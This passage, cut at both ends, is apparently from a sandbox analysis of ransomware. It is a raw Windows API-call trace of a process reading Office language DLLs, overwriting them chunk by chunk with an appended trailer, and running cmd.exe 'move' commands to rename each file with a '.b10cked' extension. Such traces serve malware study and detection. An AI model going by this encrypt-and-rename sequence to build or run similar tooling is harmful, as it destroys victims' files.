lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x77560 [0159.817] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0159.818] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0159.818] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0159.884] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0159.977] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.007] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.007] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.008] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.008] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.008] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x57560 [0160.008] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.025] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.042] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0160.044] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x57560 [0160.044] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.044] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.045] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0160.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0160.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISINTL.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0160.050] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x77560 [0160.050] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.051] CloseHandle (hObject=0x114) returned 1 [0160.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX") returned 0x3c [0160.057] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.058] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\VISINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xedc, dwThreadId=0xe14)) returned 1 [0160.060] CloseHandle (hObject=0x1b4) returned 1 [0160.060] CloseHandle (hObject=0x114) returned 1 [0160.060] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.060] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.060] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.060] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.060] ReleaseMutex (hMutex=0xf8) returned 1 [0160.061] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21685031028) returned 1 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.061] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.062] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x25b60 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.063] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x25678 [0160.063] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x25b60 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x25b60 [0160.511] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0160.512] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.512] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.738] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0160.742] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0160.742] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.743] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0160.743] SetFilePointer (in: hFile=0x114, lDistanceToMove=-77231, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12db1 [0160.743] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0160.744] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x3daf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x3daf, lpOverlapped=0x0) returned 1 [0160.747] SetFilePointer (in: hFile=0x114, lDistanceToMove=-77231, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x12db1 [0160.747] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0160.747] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3daf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3daf, lpOverlapped=0x0) returned 1 [0160.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0160.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0160.753] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x25b60 [0160.753] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0160.753] CloseHandle (hObject=0x114) returned 1 [0160.755] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX") returned 0x3c [0160.756] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0160.756] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\WWINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x928, dwThreadId=0xe74)) returned 1 [0160.758] CloseHandle (hObject=0x1b4) returned 1 [0160.758] CloseHandle (hObject=0x114) returned 1 [0160.758] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.758] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0160.758] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0160.758] ReleaseMutex (hMutex=0xf8) returned 1 [0160.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.821] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.821] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21761069065) returned 1 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x115b60 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0160.822] SetFilePointer (in: 